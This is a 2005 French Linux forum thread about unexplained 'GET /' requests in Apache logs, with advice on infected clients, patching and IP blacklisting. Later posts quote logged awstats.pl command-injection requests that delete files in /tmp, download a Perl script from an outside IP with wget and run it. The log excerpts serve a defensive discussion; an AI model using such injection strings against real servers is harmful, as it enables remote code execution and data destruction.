[apache] scans port 80 ???

scans port 80 ??? [apache] - réseaux et sécurité - Linux et OS Alternatifs

Marsh Posté le 07-10-2005 à 17:32:41    

J'ai des trucs comme ca dans mes logs apache :
 

Code :
  1. 82.226.155.21 - - [07/Oct/2005:15:17:33 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  2. 82.226.158.16 - - [07/Oct/2005:15:29:45 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  3. 82.226.155.21 - - [07/Oct/2005:15:47:44 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  4. 82.226.133.200 - - [07/Oct/2005:16:03:34 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  5. 82.226.17.124 - - [07/Oct/2005:16:09:01 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  6. 82.226.205.55 - - [07/Oct/2005:16:44:03 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  7. 82.226.205.55 - - [07/Oct/2005:16:48:26 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"
  8. 82.226.34.159 - - [07/Oct/2005:16:57:27 +0200] "GET / HTTP/1.0" 200 7401 "-" "-" "-"


 
Pas de referer, pas de user agent, juste un GET / et pas de GET des autres elements de la page d'acceuil.
 
Ces requetes sont beaucoup plus nombreuses depuis 2 mois environ, et viennent a 95% de chez Free (le serveur est sur une Freebox lui aussi).
C'est quoi, juste un scan de port ?

Reply

Marsh Posté le 07-10-2005 à 17:32:41   

Reply

Marsh Posté le 07-10-2005 à 22:44:00    

ce sont des PC infectés (webdav) qui essayent de lancer des attaques.  

Reply

Marsh Posté le 08-10-2005 à 11:10:19    

jlighty a écrit :

ce sont des PC infectés (webdav) qui essayent de lancer des attaques.


Comment se premunir de se type attaques?.  
 
Il y a des spécialiste de la sécurité pour nous donner des conselle;

Reply

Marsh Posté le 08-10-2005 à 11:15:31    

si c'est apache il n'y a aucun risque il me semble que c'est uniquement pour IIS.

Reply

Marsh Posté le 08-10-2005 à 13:47:40    

Ah intéressant merci je me posais exactement la même question depuis hier.
Et on peut rien faire pour informer les pauvres infectés ?
 
Bonne après-midi

Reply

Marsh Posté le 08-10-2005 à 14:20:30    

tu contactes le service abuse de leur fai ou tu bannis leur IP (iptables drop)

Reply

Marsh Posté le 08-10-2005 à 14:22:33    

jlighty a écrit :

si c'est apache il n'y a aucun risque il me semble que c'est uniquement pour IIS.


 
Je peux comprendre ton point vu .  
Mais un serveur qui tourne sur iis ou Linux si il est ma configuré laisse des failles c'est certain..  également une installation par defauts..  
 
il y a toujours des enseignements a tenir des spécialistes en sécurite..  
il y a des palteformes client-serveur sous  windows qui fonctionne bien et très bien sécurisé..


Message édité par DDoS le 08-10-2005 à 14:24:32
Reply

Marsh Posté le 08-10-2005 à 14:27:27    

les attaques que initiators a rapporté sont dédiés à IIS non patché. Cependant il ne faut pas oublié qu'Apache n'est pas à l'abris d'attaque ou carrément c'est les scripts CGI (ex: attaque via awstats.pl)
Il faut toujours mettre à jour ses services (FTP, HTTP...) et leur contenu (script php, perl...) que l'on tourne sous Windows ou Linux.


Message édité par jlighty le 08-10-2005 à 14:28:18
Reply

Marsh Posté le 08-10-2005 à 19:20:25    

Ouais de tte facon faut toujours garder les versions à jours mais perso avec apt y a pas de soucis  ;).
 
Sinon je veux pas leur poser de problèmes mais plutôt les informer qu'ils en ont un mais c sur je vois pas de manière simple pour faire ça avec leur ip.

Reply

Marsh Posté le 08-10-2005 à 19:33:23    

2 solutions :
- soit tu les ignores
- soit tu les blacklists
car si l'abuse de Free réagit, il risque de couper sa connexion jusqu'à ce que l' "attaquant" répare son PC.

Reply

Marsh Posté le 08-10-2005 à 19:33:23   

Reply

Marsh Posté le 08-10-2005 à 19:35:12    

jlighty a écrit :

2 solutions :
- soit tu les ignores
- soit tu les blacklists
car si l'abuse de Free réagit, il risque de couper sa connexion jusqu'à ce que l' "attaquant" répare son PC.


ce ne serait pas un mal a mon avis .

Reply

Marsh Posté le 08-10-2005 à 19:37:18    

mikala a écrit :

ce ne serait pas un mal a mon avis .


Y'aurait bcp moins d'internautes d'un coup, tiens ...   [:tinostar]


---------------
« Ce qui ne vous tue pas vous rend plus fort » F. Nietzsche | « Vise_ la Lune. Si tu rates, au pire, t'es dans la merde » Un poète disparu dans le cercle
Reply

Marsh Posté le 08-10-2005 à 19:38:15    

Zzozo a écrit :

Y'aurait bcp moins d'internautes d'un coup, tiens ...   [:tinostar]


 
cette économie de BP du coup :love:

Reply

Marsh Posté le 08-10-2005 à 19:52:16    

mikala a écrit :

cette économie de BP du coup :love:


Moins d'emmerdeurs sur les forums  :love:  :love:


---------------
« Ce qui ne vous tue pas vous rend plus fort » F. Nietzsche | « Vise_ la Lune. Si tu rates, au pire, t'es dans la merde » Un poète disparu dans le cercle
Reply

Marsh Posté le 10-10-2005 à 10:59:25    

J'ai cherche quelques info sur les attaques sur awstats.pl
J'en ai jamais vu passer sur mon serveur. Je vois surtout passer des trucs destines a des IIS en fait.

Reply

Marsh Posté le 10-10-2005 à 11:17:19    

tu n'as jamais eu de ?
"GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://150.214.140.196/.it/icet;perl%20i
cet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1"


Message édité par jlighty le 10-10-2005 à 11:21:43
Reply

Marsh Posté le 10-10-2005 à 15:46:57    

J'ai eu quelques truc dans ce style la:
 
158.170.64.3 - - [12/May/2005:08:47:24 +0200] "GET //cgi-bin/awstats.pl HTTP/1.1" 404 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
158.170.64.3 - - [12/May/2005:08:47:24 +0200] "GET //cgi/awstats.pl HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
158.170.64.3 - - [12/May/2005:08:47:25 +0200] "GET //awstats/awstats.pl HTTP/1.1" 404 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 
 
Et sur un autre serveur j'ai effectivement eu quelques trucs comme ca:
 
203.114.64.241 - - [13/Sep/2005:07:38:38 +0200] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 404 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
203.114.64.241 - - [13/Sep/2005:07:38:39 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
203.114.64.241 - - [13/Sep/2005:07:38:40 +0200] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http://80.53.220.138/.it/icet;perl%20icet;echo%20;rm%20-rf%20icet*;echo| HTTP/1.1" 404 411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 
Mais moins de 10 requetes, et uniquement le 13 septembre.

Reply

Marsh Posté le 10-10-2005 à 16:20:44    

Zzozo a écrit :

Moins d'emmerdeurs sur les forums  :love:  :love:


 
Plus besoin de modos [:dawa]

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed